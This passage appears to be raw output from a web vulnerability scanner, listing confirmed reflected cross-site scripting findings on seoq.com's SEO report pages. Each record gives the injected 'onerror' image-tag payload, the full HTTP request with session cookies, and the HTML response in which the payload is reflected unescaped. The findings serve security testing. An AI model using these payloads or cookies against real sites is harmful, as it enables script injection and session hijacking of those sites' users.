FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F2272%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F2272%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/04/22/2272/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/04/22/1797/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/04/22/1797/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/04/22/1797/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/04/22/1797/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/04/22/1797/members.multimania.co.uk/noguzuv
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:26 GMT; path=/quotient
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F1797%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F1797%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/04/22/1797/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/04/22/2270/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/04/22/2270/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/04/22/2270/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/04/22/2270/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/04/22/2270/members.multimania.co.uk/kisuxoge
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:31 GMT; path=/quotient
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
<div id="social-media-buttons">Share: <a href="http://www.facebook.com/share.php?u=<url>" onclick="return fbs_click()"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/facebook-share-button-seo-tool.gif" alt="share on facebook" width="30" height="31"/></a><a href="http://del.icio.us/post?url=http://www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/delicious-share-button-seo-tool.gif" alt="Share on Delicious" width="29" height="31"/></a><a href="http://www.stumbleupon.com/submit?url=www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/stumbleupon-share-button-seo-tool.gif" alt="Share on Stumble Upon" width="30" height="31"/></a><a href="http://twitter.com/home?status=SEO Quotient, online SEO tool - www.seo-quotient.com"><img src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/twitter-share-button-seo-tool.gif" alt="Share on Twitter" width="29" height="31"/></a>

</div>
<div class="google_form">
<form id="cse-search-box" action="http://www.seoq.com/search-results/">
<input type="hidden" value="002680724730993913492:hys1pl1blsa" name="cx" />
<input type="hidden" value="FORID:10" name="cof" />
<input type="hidden" value="UTF-8" name="ie" />
<input type="text" id="search-google" size="" name="q" style="border: 1px solid rgb(126, 157, 185); padding: 2px;" />
<input type="submit" id="submit-google" value="Search" name="sa" />
<input type="hidden" name="siteurl" value="www.seoq.com/" />
<input type="hidden" name="siteurl" value="www.seoq.com" /></form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&lang=en" type="text/javascript"></script>
</div>
</div>
<div id="navbar">
<ul id="menu"> <li><a href="http://www.seoq.com/about-seo-quotient" title="About">About Us</a></li> <li><a href="http://www.seoq.com/web/professionals" title="Directory">Directory</a></li> <li class="current_page_item"> <a href="http://www.seoq.com/quotient" title="SEO Tools">SEO Tools</a> <ul class='children'> <li class="page_item page-item-2306"><a href="/quotient/analysis" title="SEO Analysis Tool">SEO Analysis Tool</a></li> <li class="page_item page-item-2291"><a href="/searchengine-analysis/" title="Technical SEO Analysis">Technical SEO Analysis</a></li> <li class="page_item page-item-2295"><a href="/blvdstatus/" title="Real-time Web Analytics">Real-time Web Analytics</a></li> <li class="page_item page-item-2299"><a href="/webstatshq/" title="Traffic Ranking Software">Traffic Ranking Software</a></li> </ul> </li> <li><a href="http://www.seoq.com/blog" title="Blog">Blog</a></li> <li> <a href="http://www.seoq.com/7-c-of-online-marketing-seo" title="SEO Tools">7 C’s</a> <ul class='children'> <li class="page_item page-item-2244"><a href="/7-c-of-online-marketing-seo/crawlability/" title="Crawlability">Crawlability</a></li> <li class="page_item page-item-2285"><a href="/7-c-of-online-marketing-seo/credibility/" title="Credibility">Credibility</a></li> </ul> </li> <li><a href="http://www.seoq.com/web/" title="Discussions">Discussions</a></li> </ul> </div>
<div id="rss-header"><a href="http://www.seoq.com/feed/"><img width="27" height="25" alt="RSS feed" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/rss-button-seo-tool.png" /></a></div>
<div id="secondary-menu" class="login"> <a href="http://www.seoq.com/web/users/login" title="Login">Login</a> <a href="http://www.seoq.com/web/users/register" title="Sign Up">Sign Up</a> </div> </div>
<div id="content-top-wrap">
<div id="content-bottom-wrap">
<div id="content">

<script type="text/javascript">function fbs_click() {u=location.href;t=document.title;window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}</script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script><script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script><link rel="stylesheet" type="text/css" href="http://www.highcharts.com/highslide/highslide.css" /><script type="text/javascript"> $(function() { $("#tabs").tabs(); }); function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;} $(function() { $(".report").hide(); $("#highLevelReport").hide(); $("#reportDoesNotExist").show(); }); </script> <div id="reportDoesNotExist" class="ui-tabs-panel"> <div class="share-buttons"> <p></p> <div class="share"></div> </div> <div class="clear"></div> <div id="entry-summary"> <p><strong>Report not found</strong> Please check the URL.<br /><br /> URL for this report:<a href="http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>ddd</a> </p> </div> </div> <div id="entry-summary"> <p>SEO Quotient™ website analysis of: <strong></strong><br /> URL for this report: <a href="http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)></a></p> <p>This URL has been analyzed: 0 times </p> </div><div class="report"> <div id="highLevelReport"> <div class="info-1"> <div class="grid-1"> <h3>Crawlability </h3> <div id="chart_crawlability">Crawlability Score</div> <br /> <h4>Section 1: Crawlability</h4> <p>Crawlability is how easy it is for search engine spiders and robots to get inside your website ... scan the words, photos and videos and index that information in its archives...</p> <ul><li><a href="#crawlabilityDetail">(See Crawlability details)</a></li></ul> </div> <div class="grid-1"> <h3>Credibility </h3> <div id="chart_credibility">Credibility Score</div> <br /> <h4>Section 2: Credibility</h4> <p>Credibility has a lot to do with what other people, bloggers and webmasters have to say about you. For example, the more references or citations to your website, the more credibility you have...</p> <ul><li><a href="#credibilityDetail">(See Credibility details)</a></li></ul> </div> <div class="grid-1 alpha"> <h3>Code </h3> <div id="chart_code">Code Score</div> <br /> <h4>Section 3: Code</h4> <p>Code refers to the extra emphasis you place on Content behind the scene. It involves meta tags, title tags, headings, hyperlinks, bullet lists and other techniques to bring more attention to specific words...</p> <ul><li><a href="#codeDetail">(See Code details)</a></li></ul> </div> </div> <div class="info-1"> <h3>Content </h3> <p>Content is the actual words, pictures, charts, graphs and videos you have. The only way search engines can determine how relevant you are vis-a-vis a search it to study the content on your website... </p> <table> <tr id="charts-row"> <td><div id="keywords_graph" style="width: 300px; height: 200px; margin: 0 auto"></div></td> <td><div id="doublePhrase_graph" style="width: 400px; height: 200px; margin: 0 auto"></div></td> </tr> </table> <ul><li><a href="#contentDetail">(See Content details)</a></li></ul> </div> <div class="clear"></div> </div><script type="text/javascript"> var chart_crawlability = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_crawlability.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Crawlability/14"); chart_crawlability.render("chart_crawlability"); var chart_credibility = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_credibility.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Credibility/5"); chart_credibility.render("chart_credibility"); var chart_code = new FusionCharts("/quotient/scores/AngularGauge.swf", "ChId1", "240", "155", "0", "1"); chart_code.setDataURL("http://www.seoq.com/quotient/webanalytics/score_in_xml//Code/6"); chart_code.render("chart_code");</script> <a name="crawlabilityDetail"></a><h2>Crawlability</h2> <div id="crawlabilityDetail"> <div class="share-buttons"> <p>Share this report on:</p> <div class="share"> <ul> <li><a onclick="return fbs_click()" title="facebook share" href="http://www.facebook.com/share.php?u=<url>" target="_blank"> <img src="http://www.seoq.com/quotient/img/facebook.jpg" width="28" height="28" alt="Share on Facebook" /></a> </li> <li><a href="http://twitter.com/home?status=Check my SEO at - http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>" target="_blank" title="twitter share" > <img src="http://www.seoq.com/quotient/img/twitter.jpg" width="28" height="28" alt="Share on twitter" /></a> </li> <li><a href="http://www.linkedin.com/shareArticle?mini=true&url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F2270%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=SEO+Quotient%EF%BF%BD+Diagnostic+Report&summary=&source=seoq.com" target="_blank" title="linkedin share"> <img src="http://www.seoq.com/quotient/img/linkedin.jpg" width="28" height="28" alt="Share on LinkedIn" /></a> </li> <li><a href="http://digg.com/submit?phase=2&url=http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>&title=SEO Quotient� Diagnostic Report&bodytext=" target="_blank" title="digg share"> <img src="http://www.seoq.com/quotient/img/digg.jpg" width="28" height="28" alt="Share on Digg" /></a> </li> <li><a href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.seoq.com%2Fquotient%2F2011%2F04%2F22%2F2270%2F%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&title=stumbleupon_title" target="_blank" title="stumbleupon share"> <img src="http://www.seoq.com/quotient/img/stumbleupon.jpg" width="27" height="28" alt="Share on StumbleUpon" /></a> </li> <li><a href="http://technorati.com/faves?add=http://www.seoq.com/quotient/2011/04/22/2270/><iMg src=N onerror=netsparker(9)>" target="_blank" title="technorati share"> ..

- /quotient/2011/04/22/2271/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

/quotient/2011/04/22/2271/%3E%3CiMg%20src=N%20onerror=alert(9)%3E CONFIRMED

http://www.seoq.com/quotient/2011/04/22/2271/%3E%3CiMg%20src=N%20onerror=alert(9)%3E

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	><iMg src=N onerror=alert(9)>

Request

GET /quotient/2011/04/22/2271/%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E HTTP/1.1
Referer: http://www.seoq.com/quotient/2011/04/22/2271/members.multimania.co.uk/foqupaka
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; PHPSESSID=81vpd80f1tet77i3g4sh4nom04; CAKEPHP=mkgiit8dars4st0s51imtuc053
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:15:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=depb5rrurbed9dcocjraci6ot1; expires=Mon, 09-May-2011 02:15:33 GMT; path=/quotient
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="/quotient/css/style.css" /><script type="text/javascript">//<![CDATA[AC_FL_RunContent = 0;//]]></script> <script type="text/javascript" src="/quotient/js/jquery.js"></script> <script type="text/javascript" src="/quotient/js/jquery.validate.js"></script> <script type="text/javascript" src="/quotient/js/AC_RunActiveContent.js"></script><script type="text/javascript" src="/quotient/js/highcharts.js"></script> <script type="text/javascript" src="/quotient/js/excanvas.compiled.js"></script> <script type="text/javascript" src="/quotient/js/FusionCharts.js"></script> <script type="text/javascript" src="/quotient/js/jquery.simplemodal-1.3.5.js"></script> <script type="text/javascript" src="/quotient/js/seoq.tool.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui.min.js"></script> <script type="text/javascript" src="/quotient/js/jquery-ui-widgets.min.js"></script>
<script type="text/javascript">

</script>
</head>

<body>

<div class="wrapper">
<div id="header">
<div id="title">
<a href="http://www.seoq.com"><img alt="SEO Quotient™" title="SEO Quotient™" src="http://www.seoq.com/wp-content/themes/seo-quotient-theme/images/logo-web-analyzer-tool.jpg" /></a>
</div>
<div class="top_header">
